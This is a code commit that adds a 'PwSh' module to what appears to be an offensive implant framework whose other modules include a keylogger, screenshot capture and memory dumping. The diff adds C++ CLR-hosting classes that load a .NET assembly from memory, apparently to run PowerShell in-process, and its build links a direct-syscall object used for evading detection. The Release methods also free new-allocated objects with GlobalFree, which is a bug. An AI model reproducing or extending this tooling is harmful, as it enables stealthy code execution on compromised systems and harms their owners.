Add PwSh

Author: maxDcb

modules/CMakeLists.txt

@@ -28,4 +28,5 @@ add_subdirectory(KeyLogger)
 add_subdirectory(ScreenShot)
 add_subdirectory(MiniDump)
 add_subdirectory(DotnetExec)
+add_subdirectory(PwSh)
 

modules/PwSh/AssemblyManager.cpp

@@ -0,0 +1,62 @@
+#include "AssemblyManager.hpp"
+
+
+MyAssemblyManager::MyAssemblyManager(void)
+{
+	count = 0;
+	m_assemblyStore = new MyAssemblyStore();
+};
+
+
+MyAssemblyManager::~MyAssemblyManager(void)
+{
+	delete m_assemblyStore;
+};
+
+
+HRESULT STDMETHODCALLTYPE MyAssemblyManager::QueryInterface(REFIID vTableGuid, void** ppv) 
+{
+	if (!IsEqualIID(vTableGuid, IID_IUnknown) && !IsEqualIID(vTableGuid, IID_IHostAssemblyManager)) 
+	{
+		*ppv = 0;
+		return E_NOINTERFACE;
+	}
+	*ppv = this;
+	this->AddRef();
+	return S_OK;
+}
+
+
+ULONG STDMETHODCALLTYPE MyAssemblyManager::AddRef() 
+{
+	return(++((MyAssemblyManager*)this)->count);
+}
+
+
+ULONG STDMETHODCALLTYPE MyAssemblyManager::Release() 
+{
+	if (--((MyAssemblyManager*)this)->count == 0) 
+	{
+		GlobalFree(this);
+		return 0;
+	}
+	return ((MyAssemblyManager*)this)->count;
+}
+
+
+// This returns a list of assemblies that we are telling the CLR that we want it to handle loading (when/if a load is requested for them)
+// We can just return NULL and we will always be asked to load the assembly, but we can tell the CLR to load it in our ProvideAssembly implementation
+HRESULT STDMETHODCALLTYPE MyAssemblyManager::GetNonHostStoreAssemblies(ICLRAssemblyReferenceList** ppReferenceList) 
+{
+	*ppReferenceList = NULL;
+	return S_OK;
+}
+
+
+//This is responsible for returning our IHostAssemblyStore implementation
+HRESULT STDMETHODCALLTYPE MyAssemblyManager::GetAssemblyStore(IHostAssemblyStore** ppAssemblyStore) 
+{
+	*ppAssemblyStore = m_assemblyStore;
+	return S_OK;
+}
+

modules/PwSh/AssemblyManager.hpp

@@ -0,0 +1,41 @@
+#pragma once
+#include "AssemblyStore.hpp"
+
+
+class MyAssemblyManager : public IHostAssemblyManager
+{
+public:
+	MyAssemblyManager(void);
+	~MyAssemblyManager(void);
+
+    virtual HRESULT STDMETHODCALLTYPE QueryInterface(REFIID riid,void  **ppv);
+    virtual ULONG   STDMETHODCALLTYPE AddRef(void);
+    virtual ULONG   STDMETHODCALLTYPE Release(void);
+
+	virtual HRESULT STDMETHODCALLTYPE GetNonHostStoreAssemblies(ICLRAssemblyReferenceList** ppReferenceList);
+	virtual HRESULT STDMETHODCALLTYPE GetAssemblyStore(IHostAssemblyStore** ppAssemblyStore);
+
+	int setTargetAssembly(TargetAssembly * targetAssembly)
+	{
+		m_assemblyStore->setTargetAssembly(targetAssembly);
+		return 0;
+	}
+
+	int updateTargetAssembly(ICLRAssemblyIdentityManager* identityManager, const std::string& data)
+	{
+		m_assemblyStore->updateTargetAssembly(identityManager, data);
+		return 0;
+	}
+
+	LPWSTR getAssemblyInfo()
+	{
+		return m_assemblyStore->getAssemblyInfo();
+	};
+
+protected:	
+	DWORD count;
+
+private:
+	MyAssemblyStore* m_assemblyStore;
+
+};

modules/PwSh/AssemblyStore.cpp

@@ -0,0 +1,114 @@
+#include "AssemblyStore.hpp"
+#include <objbase.h>
+
+#include <iostream>
+
+#include <shlwapi.h>
+#pragma comment(lib, "Shlwapi.lib")
+
+
+MyAssemblyStore::MyAssemblyStore(void)
+{
+	count = 0;
+	m_targetAssembly = nullptr;
+};
+
+
+MyAssemblyStore::~MyAssemblyStore(void)
+{
+};
+
+
+HRESULT STDMETHODCALLTYPE MyAssemblyStore::QueryInterface(REFIID vTableGuid, void** ppv) 
+{
+	if (!IsEqualIID(vTableGuid, IID_IUnknown) && !IsEqualIID(vTableGuid, IID_IHostAssemblyStore)) 
+	{
+		*ppv = 0;
+		return E_NOINTERFACE;
+	}
+	*ppv = this;
+	this->AddRef();
+	return S_OK;
+}
+
+
+ULONG STDMETHODCALLTYPE MyAssemblyStore::AddRef() 
+{
+	return(++((MyAssemblyStore*)this)->count);
+}
+
+
+ULONG STDMETHODCALLTYPE MyAssemblyStore::Release() 
+{
+	if (--((MyAssemblyStore*)this)->count == 0) 
+	{
+		GlobalFree(this);
+		return 0;
+	}
+	return ((MyAssemblyStore*)this)->count;
+}
+
+
+int TargetAssembly::updateTargetAssembly(ICLRAssemblyIdentityManager* identityManager, const std::string& data)
+{
+	m_assembly=data;
+
+	if(m_assemblyStream!=nullptr)
+		m_assemblyStream->Release();
+
+	m_assemblyStream = SHCreateMemStream((BYTE *)m_assembly.data(), m_assembly.size());
+	identityManager->GetBindingIdentityFromStream(m_assemblyStream, CLR_ASSEMBLY_IDENTITY_FLAGS_DEFAULT, m_assemblyInfo, &m_identityBufferSize);
+
+	// std::cout << "updateTargetAssembly " << m_assembly.size() << std::endl;
+	// std::wcout << "assemblyInfo " << m_assemblyInfo << std::endl;
+	m_id++;
+
+	return 0;
+}
+
+
+int MyAssemblyStore::updateTargetAssembly(ICLRAssemblyIdentityManager* identityManager, const std::string& data)
+{
+	m_targetAssembly->updateTargetAssembly(identityManager, data);
+
+	return 0;
+}
+
+
+
+HRESULT STDMETHODCALLTYPE MyAssemblyStore::ProvideAssembly(AssemblyBindInfo* pBindInfo, UINT64* pAssemblyId, UINT64* pContext, IStream** ppStmAssemblyImage, IStream** ppStmPDB) 
+{
+	// std::cout << "MyAssemblyStore::ProvideAssembly " << std::endl;
+	// std::wcout << "pBindInfo->lpPostPolicyIdentity     " << pBindInfo->lpPostPolicyIdentity << std::endl;
+	// std::wcout << "m_targetAssembly->getAssemblyInfo() " << m_targetAssembly->getAssemblyInfo() << std::endl;
+
+	// Check if the identity of the assembly being loaded is the one we want
+	if (m_targetAssembly!=nullptr && wcscmp(m_targetAssembly->getAssemblyInfo(), pBindInfo->lpPostPolicyIdentity) == 0) 
+	{
+		//This isn't used for anything here so just set it to 0
+		*pContext = 0;
+
+		UINT64 id = m_targetAssembly->getId();
+		*pAssemblyId = id;
+
+		//Create an IStream using our in-memory assembly bytes and return it to the CLR
+		*ppStmAssemblyImage = SHCreateMemStream((BYTE *)m_targetAssembly->getAssembly(), m_targetAssembly->getAssemblySize());
+		return S_OK;
+
+	}
+
+	// std::wcout <<" !!!!!!!!!!!!!!!!! FAILLLLLLLLLLLLLLED !!!!!!!!!!!" << std::endl;
+
+	// If it's not our assembly then tell the CLR to handle it
+	return HRESULT_FROM_WIN32(ERROR_FILE_NOT_FOUND);
+}
+
+
+// This shouldn't really get called but if it does we'll just tell the CLR to find it
+HRESULT STDMETHODCALLTYPE MyAssemblyStore::ProvideModule(ModuleBindInfo* pBindInfo,	DWORD* pdwModuleId,	IStream** ppStmModuleImage,	IStream** ppStmPDB) 
+{
+	// std::cout << "MyAssemblyStore::ProvideModule" << std::endl;
+
+	//Tell the CLR to handle this
+	return HRESULT_FROM_WIN32(ERROR_FILE_NOT_FOUND);
+}

modules/PwSh/AssemblyStore.hpp

@@ -0,0 +1,94 @@
+#pragma once
+#include <Windows.h>
+#include <mscoree.h>
+#include <metahost.h>
+
+#include <string>
+
+#include <shlwapi.h>
+
+
+class TargetAssembly
+{
+public:
+	TargetAssembly(void)
+	{
+		m_assemblyStream = nullptr;
+
+		m_id = 5000;
+		m_assemblyInfo = (LPWSTR)malloc(4096);
+		m_identityBufferSize = 4096;
+
+	};
+	~TargetAssembly(void)
+	{
+		free(m_assemblyInfo);
+	};
+
+	int updateTargetAssembly(ICLRAssemblyIdentityManager* identityManager, const std::string& data);
+	
+	LPWSTR getAssemblyInfo()
+	{
+		return m_assemblyInfo;
+	};
+
+	int getId()
+	{
+		return m_id;
+	};
+
+	char* getAssembly()
+	{
+		return m_assembly.data();
+	};
+
+	int getAssemblySize()
+	{
+		return m_assembly.size();
+	};
+	
+private:
+	DWORD m_identityBufferSize;
+	LPWSTR m_assemblyInfo;
+
+	std::string m_assembly;
+
+	IStream* m_assemblyStream;
+
+	int m_id;
+};
+
+
+class MyAssemblyStore : public IHostAssemblyStore
+{
+public:
+	MyAssemblyStore(void);
+	~MyAssemblyStore(void);
+
+    virtual HRESULT STDMETHODCALLTYPE QueryInterface(REFIID riid,void  **ppv);
+    virtual ULONG   STDMETHODCALLTYPE AddRef(void);
+    virtual ULONG   STDMETHODCALLTYPE Release(void);
+
+	virtual HRESULT STDMETHODCALLTYPE ProvideAssembly(AssemblyBindInfo* pBindInfo, UINT64* pAssemblyId, UINT64* pContext, IStream** ppStmAssemblyImage, IStream** ppStmPDB);
+	virtual HRESULT STDMETHODCALLTYPE ProvideModule(ModuleBindInfo* pBindInfo, DWORD* pdwModuleId, IStream** ppStmModuleImage, IStream** ppStmPDB);
+	
+	int setTargetAssembly(TargetAssembly * targetAssembly)
+	{
+		m_targetAssembly = targetAssembly;
+		return 0;
+	}
+
+	int updateTargetAssembly(ICLRAssemblyIdentityManager* identityManager, const std::string& data);
+
+	LPWSTR getAssemblyInfo()
+	{
+		return m_targetAssembly->getAssemblyInfo();
+	};
+
+protected:
+	DWORD count;
+
+private:
+	TargetAssembly* m_targetAssembly;
+
+};

modules/PwSh/CMakeLists.txt

@@ -0,0 +1,25 @@
+include_directories(../)
+if(WIN32)
+    add_library(PwSh SHARED PwSh.cpp HostControl.cpp AssemblyManager.cpp AssemblyStore.cpp HostMalloc.cpp MemoryManager.cpp ../ModuleCmd/syscall.cpp ../ModuleCmd/syscall.x64.obj )
+else()
+    add_library(PwSh SHARED PwSh.cpp)
+endif()
+set_property(TARGET PwSh PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded")
+target_link_libraries(PwSh )
+add_custom_command(TARGET PwSh POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 
+$<TARGET_FILE:PwSh> "${CMAKE_SOURCE_DIR}/Release/Modules/$<TARGET_FILE_NAME:PwSh>")
+
+if(WITH_TESTS)
+    if(WIN32)
+        add_executable(testsPwSh tests/testsPwSh.cpp PwSh.cpp HostControl.cpp AssemblyManager.cpp AssemblyStore.cpp HostMalloc.cpp MemoryManager.cpp ../ModuleCmd/syscall.cpp ../ModuleCmd/syscall.x64.obj)
+    else()
+        add_executable(testsPwSh tests/testsPwSh.cpp PwSh.cpp)
+    endif()
+    # add_executable(testsPwSh WIN32 tests/testsPwSh.cpp PwSh.cpp HostControl.cpp AssemblyManager.cpp AssemblyStore.cpp HostMalloc.cpp MemoryManager.cpp ../ModuleCmd/syscall.cpp ../ModuleCmd/syscall.x64.obj)
+    target_link_libraries(testsPwSh )
+    set_property(TARGET testsPwSh PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded")
+    add_custom_command(TARGET testsPwSh POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 
+    $<TARGET_FILE:testsPwSh> "${CMAKE_SOURCE_DIR}/Tests/$<TARGET_FILE_NAME:testsPwSh>")
+
+    add_test(NAME testsPwSh COMMAND "${CMAKE_SOURCE_DIR}/Tests/$<TARGET_FILE_NAME:testsPwSh>")
+endif()